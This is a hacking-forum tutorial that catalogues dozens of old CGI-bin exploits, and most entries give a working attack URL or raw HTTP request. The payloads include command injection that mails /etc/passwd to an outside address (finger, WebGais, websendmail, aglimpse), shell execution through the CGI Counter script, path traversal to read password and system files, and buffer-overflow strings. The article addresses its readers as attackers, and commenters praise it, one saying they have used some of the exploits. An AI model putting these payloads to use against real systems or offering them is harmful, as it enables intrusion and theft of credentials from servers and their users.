Follow us on Twitter!
You cannot teach a man anything; you can only help him find it within himself. - Galileo
Wednesday, April 23, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 23
Guests Online: 21
Members Online: 2

Registered Members: 82885
Newest Member: ConiBE
Latest Articles

Complete Set Of CGI-BIN Exploits and what they do

Arrow Image This tutorial will show you many Cgi-Bin exploits out there and tell you what they mean.



Common Cgi-Bin Exploits By: BlackAce227

***NOTE: THESE EXPLOITS CAN BE PATCHED AND/OR PREVENTED, SO SOME EXPLOITS MAY NOT WORK. ALSO I AM NOT RESPONSIBLE FOR ANYTHING YOU DO AFTER READING THIS ARTICLE BLA BLA BLA . ***

Let�s begin...

ALSO NOTE THAT THESE ARE NOT COPIED OFF OF AN EXPLOIT SITE AND TOOK ME A LONG TIME TO WRITE SO ENJOY!


-<>-
PHF

A script which came standard with the popular Apache web server also contained a serious flaw. Incorrect parameter checks are done, and therefore literally any command you want can be executed on the system.

Exploit:

Using the URL:

http://www.thesite.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

will display the password file from the server.

-<>-
Test-Cgi

Anyone can remotely inventory the files on a machine.

Exploit:

Using the URL: http://www.thesite.com/cgi-bin/test-cgi?*

will display the contents of the server&#65533;s Cgi directory.

Using the URL: /cgi-bin/test-cgi?/*

will display the contents of the servers root directory.

Both listings will be displayed via the QUERY_STRING field, however, it is also possible to get listings via the CONTENT_TYPE, CONTENT_LENGTH, HTTP_ACCEPT, HTTP_REFERER, PATH_INFO, PATH_TRANSLATED, REQUEST_METHOD, SERVER_PROTOCOL, and (with the help of rDNS) the REMOTE_HOST field.

For example, to get a listing of the root directory via the SERVER_PROTOCOL field, you would telnet to the server on port 80 and use:

GET /cgi-bin/test-cgi?x> /*

-<>-
Fax Survey

If the HylaFAX package is installed (common on some older Linux distributions), you can send arbitrary commands running as the UID of the web server:

Exploit:

http://www.thesite.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

The above example URL could expose the password file of the server.

-<>-
Netauth

Netauth is a web based email management system for Windows NT and most UNIX platforms. This product contains a security hole that enables remote users to download local files, including files like /etc/shadow.

Exploit:

http://www.thesite.com/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd

The above URL would retrieve the password file from the server.

-<>-
Calender.pl

The vulnerability allows remote users to execute arbitrary commands on the web server with the privileges of the httpd process.

The calender_admin.pl script prompts the user for a configuration file to modify, and then in an attempt to authenticate the user, it passes the user input straight to perl open(). This can be easily exploited to execute arbitrary commands remotely.

Exploit:

http://www.thesite.com/cgi-bin/calender_admin.pl

Going to that URL will result in a username/password/configuration file input fields ignoring username and password, enter:

|<command here>|
(With the pipes) in the configuration file field.

For example:
|ping 127.0.0.1|

and the command will be executed.

-<>-
HTML Script

Htmlscript has a vulnerability in it which allows you to access system files, presumably any file the web server user can access.

Exploit:

http://www.thesite.com/cgi-bin/htmlscript?../../../../etc/passwd

The above URL would get the password file from the server.

-<>-
Finger

Get a list of e-mail addresses you found for the site (let's pretend one of them is "kangaroo@acme.net", and that your email address is "your@email.org")

Go to the finger box, and type this in (changing these email addresses for the real ones):

kangaroo@acme.net; /bin/mail your@email.org < etc/password

This takes the password file through kangaroo@acme.net and emails it to your email address. If this works you now have the etc/password file in your mailbox.

-<>-
classifieds.cgi

Classifieds is a free Cgi script for handling classified ads. There are multiple security holes in this that allow remote execution. Firstly, by setting your email address as something like "duke@viper.net.au</etc/password you can read files remotely off the server.

Also, by setting the hidden variables on an html form, a remote user can force arbitrary commands to be executed. One example of this is modifying the following variable:

><input type="hidden" name="mailprog" value="/usr/sbin/sendmail">

Changing its value to another command will cause that alternate command to be executed.

-<>-
WebGais

WebGais is an interface to the GAIS search tool. It installs a few programs in /cgi-bin. The main utility is called "WebGais" and does the actual interfacing with the search tool.

It reads the query from a user form, and then runs the GAIS search engine for that query. The author tried to protect the program by using single quotes around the query when he passed it to a "system" command. But he forgot one VERY important thing: to strip single quotes from the query (this was done in Glimpse).

Exploit:

Telnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"
line)

query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph

-><>-
Web Send mail

Websendmail is a Cgi-bin that comes with the WebGais package, which is an interface to the GAIS search tool. It is a PERL script that reads input from a form and sends e-mail to the specified destination.

Exploit:

Telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
String passed to the server, in this case xxx=90)

receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a

-><>-
Aglimpse

Glimpse HTTP is an interface to the Glimpse search tool, written in PERL. A hole can allow you to execute any command on the remote system (as the owner of the http server).
Exploit Example:
http://www.thesite.com/cgi-bin/aglimpse/80IFS=5;CMD=5mail5thegnome\@nmrc.org\ <mailto:thegnome\@nmrc.org\>passwd;eval$CMD
-<>-
Webcom's Guestbook CGI vulnerability

Webcom's guestbook CGI application for Windows NT Web servers suffers from severe security problems that allow remote users to view local system files.

Exploit Example:

http://www.thesite.com/cgi-bin/rguest.exe?template=full-path-to-filename to receive important system files
-<>-
Webdist.cgi
A security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon. (Root or nobody).

Exploit Example:

http://www.thesite.com/cgi-bin/webdist.cgi

-<>-
Wrap

This exploit allows anyone to get a listing for any directory with mode +755

Exploit Example:

http://www.thesite.com/cgi-bin/wrap

-<>-
PHP.cgi

A security flaw that lets an attacker read arbitrary files with the privileges of the http daemon. (Usually root or nobody).

Exploit Example:

http://www.thesite.com/cgi-bin/php.cgi

-<>-
Perl.exe

This exploit allows us to execute arbitrary perl code on a PC, remotely of course.

Exploit Example:

http://www.thesite.com/cgi-bin/perl.exe

-<>-
Nph-test-cgi

A security flaw that lets gets the listing of the /Cgi-Bin directory, thus discovering which Cgi&#65533;s are installed on the remote host.

Exploit Example: http://www.thesite.com/cgi-bin/ nph-test-cgi

-<>-
Nph-publish.cgi

A security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon. (Usually root or nobody).

Exploit Example:

http://www.thesite.com/cgi-bin/nph-publish.cgi

-<>-
newdsn.exe

This great exploit allows any attacker like us the ability to create files anywhere on their system if the NTFs permissions are not tight enough, and can be used to overwrite DSNs of existing databases

Exploit Example: http://www.thesite.com/cgi-bin/scripts/tools/newdsn.exe

-<>-
JJ

A security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon. (Usually root or nobody).

Exploit Example: http://www.thesite.com/cgi-bin/jj

-<>-
-<>-
info2www

A security flaw that lets us execute arbitrary commands with the privileges of the http daemon. (Usually root or nobody).

Exploit Example: http://www.thesite.com/cgi-bin/info2www

-<>-
Add-password.cgi

Look at the name of the pathway and go figure!

Exploit Example: http://www.thesite.com/cgi-bin/add-password.cgi

-<>-
imagemap.exe

This Cgi application is vulnerable to a buffer overflow that would allow a remote user (that would be us for all you stupid people out there) to execute arbitrary commands with the privileges of the administrators httpd server. (Either nobody or root)

Exploit Example: http://www.thesite.com/cgi-bin/imagemap.exe

-<>-
dumpenv.pl

This vulnerability gives up a lot of information about the web server configuration

Exploit Example: http://www.thesite.com/cgi-bin/dumpenv

-<>-
guestbook.pl

An exploit that would let us execute arbitrary commands with the privileges of the http daemon. (Root or nobody)

Exploit Example: http://www.thesite.com/cgi-bin/guestbook.pl

-<>-
guestbook.cgi

An exploit that would let us execute arbitrary commands with the privileges of the http daemon. (Root or nobody)

Exploit Example: http://www.thesite.com/cgi-bin/guestbook.cgi

-<>-
Campas

An exploit that would let us execute arbitrary commands with the privileges of the http daemon. (Root or nobody)

Exploit Example: http://www.thesite.com/cgi-bin/campas

-<>-
Scripts

If the /scripts directory is browsable (probably not if they know ANYTHING about security) then this would give us valuable information about which default scripts they have installed and also whether there are any custom scripts present which may have vulnerabilities

Exploit Example: http://www.thesite.com/cgi-bin/scripts

-<>-
loadpage.cgi

This exploit comes with the EZShopper 3.0 package. We can open subdirectories and/or view some sensitive file contents like user data files.

Exploit Example: http://www.thesite.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/

-<>-
search.cgi

A flaw that allows us to execute commands on the server and view files outside the web path.

http://www.thesite.com/cgi-bin/search.cgi?user_id=1&database=../../../etc/passwd&template=foo&distinct=1


-<>-

-<>-
CGI Counter

The popular CGI web page access counter version 4.0.7 by George Burgyan allows execution of arbitrary commands due to unchecked user input. Commands are executed with the same privilege as the web server, but other exploits can be used to get root access on an unpatched OS.

Exploit:

Using straight URL
http://www.example.com/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
(This will display the username of a given system)

Passing commands in a variable:
$ Telnet www.example.com www
GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0
X: pwd;ls -la /etc;cat /etc/password

$ Telnet www.example.com www
GET /cgi-bin/counter/nl/ord/lang=English(1);system("$ENV{HTTP_X}"); HTTP/1.0
X: echo;id;uname -a;w

-<>-
SGI Infosearch

The Info search subsystem is used to search and browse virtually all SGI on-line documentation. A vulnerability has been discovered in Infosearch.Cgi which could allow any remote user to view files on the vulnerable system with privileges of the user "nobody".

-<>-
Poll It

Poll It allows easy hosting of online polls on websites. However this CGI also enables remote attackers to read any world readable file on the server.

Exploit:

http://www.thesite.com/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00

The above URL would retrieve the password file from the server.

-<>-
Robpoll

Robpoll is a free Cgi based admin program.

Exploit:

First go to:

http://www.thesite.com/cgi-bin/robpoll.cgi?Admin

You will have an option to change the password. The password by default is "Robpoll", leaving this password thus compromises the system and its files.

-<>-
WebBanner

A security hole in the WebBanner CGI enables remote attackers to view certain files on the system, and possibly execute system commands as well.

Exploit:

http://www.thesite.com/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/passwd

The above URL will retrieve the password file from the server.

-<>-
WebWho+

WebWho+ is a free Cgi script for executing whois queries via the www. Though it does perform checks for shell escape characters on some parameters, it misses the 'type' variable and allows for malicious input to be sent to a shell. It is possible to execute arbitrary commands on a webserver running WebWho+ v1.1 with the user ID of the webserver (usually nobody).

-<>-
FormMail.pl

A serious flaw in the popular CGI program Formmail.pl allows spammers to send anonymous emails

Exploit Example:
http://www.thesite.com/cgi-bin/formmail.pl

-<>-
alibaba.pl

This exploit would allow you to have a directory listing of all files in the CGI directory. This could be used to find .pwl files and to find more directories and scripts to exploit.

Exploit Example: http://www.thesite.com/cgi-bin/alibaba.pl|dir

-<>-
input.bat

This exploit would let you execute arbitrary commands

Exploit Example: http://www.thesite.com/cgi-bin/input.bat?|dir..\..\windows


-<>-
bigconf.cgi

A security flaw that lets us execute arbitrary commands with the privileges of the http daemon. (Usually root or nobody).

Exploit Example: http://www.thesite.com/cgi-bin/bigconf.cgi

-<>-

-<>-
tst.bat

This flaw in tst.bat would allow us to read arbitrary files on a remote system

Exploit Example: http://www.thesite.com/cgi-bin/tst.bat

-<>-
idq.dll

This exploit would allow us to read arbitrary files on a remote system

Exploit Example: http://www.thesite.com/query.idq?CiTemplate=../../../somefile.ext

-<>-
FormHandler.cgi

The FormHandler CGI utility may allow us to download any file from vulnerable systems.

Exploit Example: http://www.thesite.com/formhandler.cgi

-<>-
showcode.asp


A sample Active Server Page (ASP) script installed by default on Microsoft's Internet Information Server (IIS) 4.0 would give us access to view any file on the same volume as the web server that is readable by the web server.

Exploit Example: http://www.thesite.com/msadc/Samples/SELECTOR/showcode.asp

-<>-
codebrws.asp

This exploit would allow us to view source of any file in the web root with the extensions .asp .inc .htm or .html

Exploit Example: http://www.thesite.com/iissamples/exair/howitworks/codebrws.asp

-<>-
htimage.exe

There is a buffer overflow in the remote htimage.exe when it is given the following request:

Exploit Example: http://www.thesite.com/cgi-bin/htimage.exe/AAAA[....]AAA?0,0

-<>-
wguest.exe

A request for http://www.thesite.com/cgi-bin/wguest.exe?template=c:\boot.ini will return the remote web servers boot.ini file

Exploit Example: http://www.thesite.com/cgi-bin/wguest.exe?template=c:\boot.ini

-<>-
uploader.exe


A security flaw that lets anyone upload arbitrary Cgi on the server, and then execute them.

Exploit Example: http://www.thesite.com/cgi-bin/uploader.exe

-<>-
search97.vts

This exploit can be used to remotely view any file on a web server.

Exploit Example: http://www.thesite.com/cgi-bin/search97.vts

-<>-
rguest.exe

This exploit will return with the $winnt$.inf file.

Exploit Example: http://www.thesite.com/cgi-bin/rguest.exe?template=c:\winnt\system32\$winnt$.inf

-<>-
pfdispaly.cgi

This exploit would allow us to view files on a vulnerable system with the privileges of the user
If exploited, may allow any user to view files on a vulnerable system with privileges of the user. (Usually root or nobody)

Exploit Example: http//www.thesite.com/cgi-bin/pfdisplay.cgi

-<>-
Man.sh

This exploit would allow anyone who can execute Cgi thru you web browser run any system commands with the user id of the web server and obtain the output from them in a web page.

Exploit Example: http://www.thesite.com/cgi-bin/man.sh

-<>-
/scripts/issadmin/bdir.htr

The file bdir.htr is a default IIS file which can give us a lot of unnecessary information about
a file system.

http://www.thesite.com/scripts/iisadmin/bdir.htr??c:\

-<>-
Count.cgi

A buffer can be overflowed in the Count.cgi program, allowing remote http users to execute arbitrary commands on the target machine.
Exploit Example: http://www.thesite.com/cgi-bin/Count.cgi

-<>-
CGImail.exe

An exploit that we can use to gain access to confidential
data or further escalate our privileges.

Exploit Example: http://www.thesite.com/scripts/CGImail.exe

-<>-
carbo.dll

This exploit can be used to remotely view any file on their web server.

Exploit Example: http://www.thesite.com/carbo.dll?icatcommand=file_to_view&catalogname=catalog

-<>-
args.bat

A security flaw that lets an attacker upload arbitrary files on the remote web server.

Exploit Example: http://www.thesite.com/cgi-bin/args.bat

-<>-
AnyForm2

This exploit can be used by us to email the web server's password file back to us.

Exploit Example: http://www.thesite.com/cgi-bin/AnyForm2

-<>-
get32.exe

A security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon. (Root or nobody).

Exploit Example: http://www.thesite.com/cgi-bin/get32.exe

-<>-
Ews

A security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon. (Root or nobody).

Exploit Example: http://www.thesite.com/cgi-bin/ews

-<>-
exprcalc.cfm

This exploit would allow us to view, delete and upload anything on a remote ColdFusion Application Server

Exploit Example: http://www.thesite.com/cfdocs/expeval/exprcalc.cfm

-<>-
ExAir

IIS comes with the sample site ExAir. The page /iissamples/exair/search/advsearch.asp
could be used to make IIS hang, thus preventing it from answering legitimate client requests.

Exploit Example: http://www.thesite.com/iissamples/exair/search/advsearch.asp

-<>-
ExAir

IIS comes with the sample site ExAir. The page /iissamples/exair/search/query.asp
could be used to make IIS hang, thus preventing it from answering legitimate client requests.

Exploit Example: http://www.thesite.com/iissamples/exair/search/query.asp

-<>-
ExAir

IIS comes with the sample site ExAir. The page /iissamples/exair/search/search.asp
could be used to make IIS hang, thus preventing it from answering legitimate client requests.

Exploit Example: http://www.thesite.com/iissamples/exair/search/search.asp

-<>-
Altavista

It would be possible to read the contents of any files on the remote host by using the Altavista Intranet Search Service, and performing the request below.

Exploit Example: GET http://www.thesite.com/cgi-bin/query?mss=%2e%2e/config

-<>-
input2.bat

It is possible to misuse this .bat file to make the remote server execute arbitrary commands.

Exploit Example: http://www.thesite.com/cgi-bin/input2.bat?|dir..\..\windows

-<>-
envout.bat

It is possible to misuse this .bat file to make the remote server execute arbitrary commands.

Exploit Example: http://www.thesite.com/ssi/envout.bat

-<>-
/cd/../config/html/cnf_gi.htm

It is possible to access the remote host AxisStorpoint configuration with this exploit

Exploit Example: http://www.thesite.com/cd/../config/html/cnf_gi.htm

-<>-
cachemgr.cgi

RedHat Linux 6.0 installs a default squid cache manager with not restricted access permissions. This script could be used to perform a port scan from the Cgi-host machine.

Exploit Example: http://www.thesite.com/cgi-bin/cachemgr.cgi

-<>-
Remote web root

It was possible to get the location of a virtual web directory of a host by issuing the command below.

Exploit Example: GET http://www.thesite.com/cgi-bin/ls HTTP/1.0

-<>-
CGI

This is a very no brainer exploit. Is the Cgi-bin browsable? Is sounds stupid but some people are stupid. Remember that.

Exploit Example: http://www.thesite.com/Cgi-Bin

-<>-
cgitest.exe

There is a buffer overrun in the cgitest.exe, which will allow us to execute arbitrary commands with the same privileges as the web server (root or nobody).

Exploit Example: http://www.thesite.com/cgi-bin/cgitest.exe

-<>-
ExprCalc.cfm

To display and delete any file on the system use an URL of the following form below:

Exploit Example: http://www.thesite.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:\thetargetfile

-<>-
getdrvrs.exe

Get the drivers from the Site.

Exploit Example: http://www.thesite.com/scripts/tools/getdrvrs.exe

-<>-
bnbform.cgi

Remote users can read arbitrary files on the file system.

Exploit Example: http://www.thesite.com/Cgi-Bin/bnbform.cgi

-<>-
survey.cgi

Remote users can execute commands with web server privileges

Exploit Example: http://www.thesite.com/Cgi-bin/survey.cgi

-<>-
.htaccess

This exploit would allow you to read files protected with .htaccess

http://www.thegnome.com/secure/.htaccess

-<>-
convert.bas

This exploit would allow you to read any file on the remote file system.

Exploit Example:
http://thesite.com/scripts/convert.bas?../anythingyouwanttoview

-<>-


THANKS FOR READING!!!!

BLACKACE227

Comments

0011011000111001on July 02 2005 - 04:27:37
Nice article man! Very usefull and detailed information. Keep up the good work. Smile
BlackAce227on August 18 2005 - 19:41:18
thanks man always glad my work is appreciated. Also i have kept up the good work, i have more articles than anyone else here. Pfft
system_meltdownon October 10 2005 - 21:07:21
Cool article dude I have used some of them before.
The Reaperon November 10 2005 - 18:40:24
nice article
system_meltdownon December 24 2005 - 18:21:02
Shock you forgot cgi-bin/counterfiglet/nc/f=;ls to view all files in the directory Pfft
master of puppetson February 04 2006 - 10:11:17
SWEET!
dantronixon April 20 2006 - 22:10:33
great article, can someone do a similar one for PHP exploits? thx.
TrueHackeron September 18 2006 - 20:42:39
Yeah, lots of good info here. Great Article -<>-
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.